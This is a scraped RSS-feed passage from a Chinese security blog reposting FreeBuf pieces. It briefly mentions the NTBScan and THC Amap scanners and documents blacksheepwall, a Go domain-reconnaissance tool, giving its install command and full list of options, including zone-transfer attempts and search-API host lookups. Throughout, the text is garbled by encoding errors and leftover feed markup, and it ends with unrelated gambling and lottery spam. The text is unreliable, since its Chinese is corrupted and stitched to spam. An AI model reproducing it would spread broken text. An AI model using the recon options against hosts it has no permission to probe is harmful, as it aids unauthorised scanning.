NTBScan 用简便的 C 语?#21592;?#20889;,大小不足 40 KB,也不需要特殊的库或 DLL,在 MS-DOS 命令窗口中运行。?#36865;猓琋TBScan 也适用于Linux!

年度盘点 | 安全测试者偏爱的安全测试工具 

2. THC Amap (免费)

THC Amap 的主要作者和开发人员表示,THC Amap 是第一个可以进行应用程序协议检测的工具。但是相比之下,nmap -sV 命令更适合进行应用程序指纹识别。

年度盘点 | 安全测试者偏爱的安全测试工具

*参考来源:concise courses,AngelaY 编译整理,转载于 FreeBuf 

]]>
http://www.aycelz.tw/1255.html/feed 0
用Golang写的域名信息搜集工具 http://www.aycelz.tw/1253.html http://www.aycelz.tw/1253.html#respond Tue, 09 Jan 2018 01:20:18 +0000 http://www.aycelz.tw/1253.html 用Golang写的域名信息搜集工具

blacksheepwall是一款由Go语?#21592;?#20889;的域名信息搜集工具 ,你?#37096;?#20197;在你的工具中将它作为一个?#25042;?#36719;件包来使用。

下载

blacksheepwall支持跨平台,目前它所支持的系统有windows、linux以及苹果的darwin。你可以在这里下载到不同版本的二进制软件包。

安装

你可以直接下载编译好的二进制文件运行并安装它。如果你的系统已经安装好了Go语言环境并配置好了工作区,那么你?#37096;?#20197;直接通过以下命令下载安装:

$ go get github.com/tomsteele/blacksheepwall

使用

Usage: blacksheepwall [options] <ip address or CIDR> 命令选项:  -h, --help            显示帮助信息并退出  -version              显示当前版本信息并退出  -debug                启用调试并显示从任务返回的错误。  -config               包含以下任何选项的YAML文件的位置。                        连?#22336;?#20351;用下划线代替 (例如 bing-html, bing_html).                        没有参数的选项为布尔值应该使用true/false表示(例如bing_html:true)  -timeout              SOCKET连接的最大超时时间(以秒为单位)[默认.5秒]  -concurrency <int>    最大并发任务数 [默?#24076;?00]  -server <string>      DNS服务器地址 [默?#24076;骸?.8.8.8”]  -input <string>       以行分隔的CIDR或IP地址文件  -ipv6                 寻找更多适用的AAAA记录  -domain <string>      用于某些任务的目标域可以是单一的?#37096;?#20197;是以行分隔的域名文件  -fcrdns               通过尝试检索先前确定的每个主机的A或AAAA记录来验证结果  -parse <string>       通过从先前扫描的文件中解析JSON来生成输出  -validate             使用符合RFC的正则表达式验证主机名 Passive:  -dictionary <string>  尝试检索以行分隔文件中子域的CNAME和A记录  -ns                   查找域的所有域名服务器的IP和主机名  -mx                   查找域的任何mx记录的ip和hostmame。  -yandex <string>      提供了一个Yandex搜索XML API url,使用Yandex                       搜索“rhost:”查找目标域的子域  -bing <string>        提供了一个base64编码的API密钥,使用必应搜索                       API的'ip:'来查找每个ip的主机名,而                       'domain:'来查找域的ips/hostnames  -bing-html            使用Bing搜索“ip:”来查找每个ip的主机名,而                       'domain:'查找域的ips/hostnames                         -shodan <string>      提供了一个Shodan API密钥,使用Shodan的API'/dns/reverse'来查找每个IP的主机名                       '/shodan/host/search'查找一个域的ips/hostnames,对所有IP都进行一次调用                         -reverse              检索每个主机的PTR  -viewdns-html         使用viewdns.info的IP反向查找功能查询zhu'ji主机,请谨慎使用否则会?#29615;?#26432;  -viewdns <string>     使用viewdns.info的API和IP反向查找功能查找每个主机。  -logontube            使用logontube.com的API查找主机和(或)域,截至本次发布                       该网站已?#36824;?#38381;  -exfiltrated          查找从exfiltrated.com的主机名搜索返回的主机名  -censys <string>      搜索censys.io域。名称的收集来自于这个搜索的每个主机的TLS证书。该命令选项后跟的?#22336;?#20018;为API ID和Secret并用冒号分隔  -crtsh                在crt.sh中搜索与所提供域相关的证书  -vt                   在提供域的子域名中搜索VirusTotal  -srv                  查找DNS SRV记录并检索关联的主机名/ IP信息  -cmn-crawl <string>   搜索commoncrawl.org域的子域。提供索引要使用参数                       。例如:“CC-MAIN-2017-04-index” Active:  -axfr                 尝试域的区域传输  -headers              对每个主机执行HTTP(s)请求并查找                       可能位置中的主机名  -tls                  尝试从TLS证书中检索名称                       (公用名称和主题备用名称) Output Options:  -clean                打印结果为每个主机的主机名  -csv                  打印结果为csv格式  -json                 打印结果为JSON

*参考来源:GitHub,FB小编 secist 编译,转载于FreeBuf

]]>
http://www.aycelz.tw/1253.html/feed 0
盈讯足球比分网
极速飞艇在线计划 竞猜篮球奖金算法 悠洋棋牌充值 股票涨跌的原理是什么 测试号码 极速十一选五助手 棋牌炸金花 胜负彩17146期开奖奖金 甘肃11选5开推荐号 双色球带坐标9188